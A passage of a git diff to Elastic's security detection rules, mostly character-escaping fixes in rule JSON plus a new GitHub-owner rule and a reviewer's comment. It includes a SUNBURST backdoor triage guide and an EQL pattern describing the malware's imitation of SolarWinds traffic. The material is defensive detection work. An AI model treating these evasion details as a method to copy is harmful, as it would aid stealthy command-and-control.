investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_107.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_107.json index b91974195d4..13287cb0629 100644 
--- a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_107.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUNBURST Command and Control Activity", - "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 
'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_103.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_103.json index 1475e21548a..0a5358b0e85 100644 
--- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_103.json +++ b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_104.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_104.json index 8168b8f3055..57f73b8bb2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_104.json +++ b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_105.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_105.json index 8f8caafd4f0..e12ae196c3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_105.json +++ b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_206.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_206.json index 624a3b4fbbf..44e186de1c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_206.json 
+++ b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_206.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_103.json b/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_103.json index 1a971623b8a..3d731b83199 100644 --- a/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_104.json b/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_104.json index cac4413ae14..07cab005157 100644 --- a/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2326d1b2-9acf-4dee-bd21-867ea7378b4d_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_103.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_103.json index 8e4b0df32c3..de764d6b1f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_103.json 
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_104.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_104.json index e0b35026f90..f559ce831fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_105.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_105.json index 286fd8eaa39..dbe4c97ad6f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_106.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_106.json index 72ba9fb68d4..70c829b5fa5 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_106.json 
@@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_107.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_107.json index 4e05b187f06..015c708f52f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json b/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json index cca05f7f45b..7f9153e4c00 100644 --- a/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_1.json b/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_1.json index f627104ed37..63795ac8267 100644 --- a/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_1.json +++ b/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_1.json 
@@ -46,7 +46,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0003",
"name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_2.json b/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_2.json
new file mode 100644
index 00000000000..3a129c96686
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/24401eca-ad0b-4ff9-9431-487a8e183af9_2.json
@@ -0,0 +1,77 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects when a new member is added to a GitHub organization as an owner. This role provides admin level privileges. Any new owner roles should be investigated to determine it's validity. Unauthorized owner roles could indicate compromise within your organization and provide unlimited access to data and settings.",
+ "from": "now-9m",
+ "index": [
+ "logs-github.audit-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "New GitHub Owner Added",
+ "query": "iam where event.dataset == \"github.audit\" and event.action == \"org.add_member\" and github.permission == \"admin\"\n",
+ "related_integrations": [
+ {
+ "package": "github",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "github.permission",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "24401eca-ad0b-4ff9-9431-487a8e183af9",
+ "severity": "medium",
+ "tags": [
+ "Domain: Cloud",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Github"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1136",
+ "name": "Create Account",
+ "reference": "https://attack.mitre.org/techniques/T1136/",
+ "subtechnique": [
+ {
+ "id": "T1136.003",
+ "name": "Cloud Account",
+ "reference": "https://attack.mitre.org/techniques/T1136/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+ },
+ "id": "24401eca-ad0b-4ff9-9431-487a8e183af9_2",
+ "type": "security-rule"
+}
\ No newline at end of file
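Review bot: The `"query"` line only matches `org.add_member` with `github.permission == "admin"`, so an existing member who is promoted to owner is not covered; GitHub's audit log records that role change as `org.update_member`, not `org.add_member`, and it is the more common escalation path for a compromised account. Consider `event.action in ("org.add_member", "org.update_member") and github.permission == "admin"`, after confirming against sample `github.audit` events that the integration populates `github.permission` with `admin` for owner-role changes on both actions. The description also has a typo, `determine it's validity` should read `determine its validity`, and the file is committed without a trailing newline (`\ No newline at end of file`).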
diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_102.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_102.json index c9d1adfe300..3966fd70e30 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_102.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_103.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_103.json index 79f3eea5787..7128f637320 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_103.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_104.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_104.json index 5ab79a57a5b..4a67a8871f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_104.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_105.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_105.json index a355c47b9c5..82c0f824de8 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_105.json 
